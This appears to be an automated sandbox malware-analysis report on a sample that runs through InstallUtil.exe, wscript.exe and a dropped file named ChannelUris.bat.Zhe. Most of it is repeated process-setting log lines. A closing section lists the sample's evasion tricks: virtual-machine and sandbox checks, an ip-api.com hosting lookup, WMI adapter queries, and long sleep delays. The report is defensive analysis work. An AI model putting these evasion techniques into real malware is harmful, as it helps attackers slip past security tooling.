                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Powershell is started from unusual location (likely to bypass HIPS)
                    Source: c:\users\user\appdata\roaming\channeluris.bat.zheKey value queried: Powershell behaviorJump to behavior
                    Source: c:\users\user\desktop\87m9y3p4z7.bat.zheKey value queried: Powershell behaviorJump to behavior
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2410949006.0000000000382000.00000040.00000400.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E93000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.0000000005783000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000052F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 27F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheMemory allocated: 4E70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: AE0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2710000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: D20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799964
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799610
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheWindow / User API: threadDelayed 2652Jump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.ZheWindow / User API: threadDelayed 2293Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6631Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheWindow / User API: threadDelayed 4361Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.ZheWindow / User API: threadDelayed 1359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3024
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6803
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 4508Thread sleep count: 2652 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 6212Thread sleep count: 2293 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 5588Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1456Thread sleep count: 6631 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1456Thread sleep count: 3204 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99778s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99670s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -99107s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160Thread sleep time: -98995s >= -30000sJump to behavior
